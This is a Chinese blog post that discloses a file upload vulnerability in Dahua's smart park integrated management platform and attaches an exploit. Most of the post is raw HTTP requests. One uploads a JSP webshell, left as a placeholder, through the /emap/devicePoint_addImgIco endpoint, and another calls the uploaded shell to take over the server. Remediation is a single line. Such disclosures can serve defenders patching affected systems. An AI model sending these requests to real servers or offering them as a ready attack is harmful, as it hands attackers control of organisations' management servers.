正文

叮~你有新的vvh速递!某华Nday漏洞(附EXP)

admin
admin V管理员 /0 评论 /80 阅读
0929
此篇文章发布距今已超过147天,您需要注意文章的内容或图片是否可用!

0x01 前言

    大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,攻击者可以利用该漏洞可以控制服务器权限

0x02 影响平台

大华智慧园区综合管理平台

0x03 漏洞复现

页面是这个酱紫

EXP:

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1Host: 192.168.2.11:81User-Agent: python-requests/2.26.0Accept-Encoding: gzip, deflateAccept: */*Connection: Keep-AliveContent-Length: 224Content-Type: multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982--f3aeb22be281d77542546a2f71e20982Content-Disposition: form-data; name="upload"; filename="a.jsp"Content-Type: application/octet-streamContent-Transfer-Encoding: binary马子内容--f3aeb22be281d77542546a2f71e20982--

上传成功会返回文件名ico_xxx_***.jsp

Success~

GET /upload/emap/society_new/ico_res_845ebece1736_on.jsp HTTP/1.1Host: 192.168.2.11:81User-Agent: python-requests/2.26.0Accept-Encoding: gzip, deflateAccept: */*Connection: Keep-Alive

shell地址:

http://192.168.2.11:81/upload/emap/society_new/ico_res_845ebece1736_on.jsp

0x04 参考来源

https://mp.weixin.qq.com/s/jk9zWDU5EEGVMpAQ6d0ocw

0x05 修复方案

建议及时更新至最新版本!


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
ZhouSa.com-宙飒天下网